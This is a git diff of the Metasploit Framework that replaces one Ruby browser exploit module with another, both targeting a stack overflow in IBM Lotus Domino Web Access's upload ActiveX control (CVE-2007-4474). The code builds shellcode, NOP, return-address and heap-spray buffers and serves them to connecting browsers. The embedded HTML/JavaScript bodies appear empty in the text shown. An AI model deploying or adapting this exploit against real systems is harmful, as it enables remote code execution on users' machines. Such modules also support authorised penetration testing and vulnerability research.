diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa7w.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa7w.rb
deleted file mode 100644
index 436ea50a1e..0000000000
--- a/modules/exploits/windows/browser/ibmlotusdomino_dwa7w.rb
+++ /dev/null
@@ -1,111 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/projects/Framework/
-##
-
-require 'msf/core'
-
-module Msf
-
-class Exploits::Windows::Browser::IBMLotusDomino_dwa7w < Msf::Exploit::Remote
-
- include Exploit::Remote::HttpServer::HTML
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'IBM Lotus Domino Web Access Upload Module dwa7w.dll Buffer Overflow',
- 'Description' => %q{
- This module exploits a stack overflow in IBM Lotus Domino Web Access Upload Module.
- By sending an overly long string to the "General_ServerName()" property located
- in the dwa7w.dll control, an attacker may be able to execute
- arbitrary code.
- },
- 'License' => MSF_LICENSE,
- 'Author' => [ 'EB and MC' ],
- 'Version' => '$Revision$',
- 'References' =>
- [
- [ 'CVE', 'CVE-2007-4474' ],
- [ 'BID', '26972' ],
- [ 'URL', 'http://milw0rm.com/exploits/4820' ],
- ],
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'process',
- },
- 'Payload' =>
- {
- 'Space' => 800,
- 'BadChars' => "\x00\x09\x0a\x0d'\\",
- 'PrepenEncoder' => "\x81\xc4\x54\xf2\xff\xff",
- },
- 'Platform' => 'win',
- 'Targets' =>
- [
- [ 'IE 6 SP0-SP2 / Windows XP SP2 Pro English', { 'Ret' => 0x74c9de3e } ], # 02/07/08
- ], # ./msfpescan -i /tmp/oleacc.dll | grep SEHandler
- 'DisclosureDate' => 'Dec 20 2007',
- 'DefaultTarget' => 0))
- end
-
- def autofilter
- false
- end
-
- def check_dependencies
- use_zlib
- end
-
- def on_request_uri(cli, request)
- # Re-generate the payload
- return if ((p = regenerate_payload(cli)) == nil)
-
- # Randomize some things
- vname = rand_text_alpha(rand(100) + 1)
- strname = rand_text_alpha(rand(100) + 1)
- rand1 = rand_text_alpha(rand(100) + 1)
- rand2 = rand_text_alpha(rand(100) + 1)
- rand3 = rand_text_alpha(rand(100) + 1)
- rand4 = rand_text_alpha(rand(100) + 1)
- rand5 = rand_text_alpha(rand(100) + 1)
-
- # Set the exploit buffer
- filler = Rex::Text.to_unescape(rand_text_alpha(2))
- jmp = Rex::Text.to_unescape([0x909006EB].pack('V'))
- ret = Rex::Text.to_unescape([target.ret].pack('V'))
- sc = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-
- # Build out the message
- content = %Q|
-
-
-
-
- |
-
- print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
-
- # Transmit the response to the client
- send_response_html(cli, content)
-
- # Handle the payload
- handler(cli)
- end
-
-end
-end
diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
new file mode 100644
index 0000000000..8c0ebeec43
--- /dev/null
+++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
@@ -0,0 +1,133 @@
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Browser::IBMLotusDomino_DWA_UploadModule < Msf::Exploit::Remote
+
+ include Exploit::Remote::HttpServer::HTML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'IBM Lotus Domino Web Access Upload Module Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack overflow in IBM Lotus Domino Web Access Upload Module.
+ By sending an overly long string to the "General_ServerName()" property located
+ in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute
+ arbitrary code.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Elazar Broad ' ],
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE', 'CVE-2007-4474' ],
+ [ 'BID', '26972' ],
+ [ 'URL', 'http://milw0rm.com/exploits/4820' ],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 800,
+ 'BadChars' => "\x00\x09\x0a\x0d'\\",
+ 'PrepenEncoder' => "\x81\xc4\x54\xf2\xff\xff",
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English', { 'Ret' => 0x0C0C0C0C } ]
+ ],
+ 'DisclosureDate' => 'Dec 20 2007',
+ 'DefaultTarget' => 0))
+ end
+
+ def autofilter
+ false
+ end
+
+ def check_dependencies
+ use_zlib
+ end
+
+ def on_request_uri(cli, request)
+ # Re-generate the payload
+ return if ((p = regenerate_payload(cli)) == nil)
+
+ # Encode the shellcode
+ shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+
+ # Setup exploit buffers
+ nops = Rex::Text.to_unescape(make_nops(4))
+ junk = Rex::Text.to_unescape(rand_text_alpha(2))
+ ret = Rex::Text.to_unescape([target.ret].pack('V'))
+ blocksize = 0x30000
+ fillto = 400
+
+ # Randomize the javascript variable names
+ dwa7w = rand_text_alpha(rand(100) + 1)
+ inotes6 = rand_text_alpha(rand(100) + 1)
+ j_shellcode = rand_text_alpha(rand(100) + 1)
+ j_nops = rand_text_alpha(rand(100) + 1)
+ j_headersize = rand_text_alpha(rand(100) + 1)
+ j_slackspace = rand_text_alpha(rand(100) + 1)
+ j_fillblock = rand_text_alpha(rand(100) + 1)
+ j_block = rand_text_alpha(rand(100) + 1)
+ j_memory = rand_text_alpha(rand(100) + 1)
+ j_counter = rand_text_alpha(rand(30) + 2)
+ j_ret = rand_text_alpha(rand(100) + 1)
+ j_junk = rand_text_alpha(rand(100) + 1)
+
+
+ # Build out the message
+ content = %Q|
+
+
+
+
+
+ |
+
+
+
+ print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+ # Transmit the response to the client
+ send_response_html(cli, content)
+
+ # Handle the payload
+ handler(cli)
+ end
+
+end
+end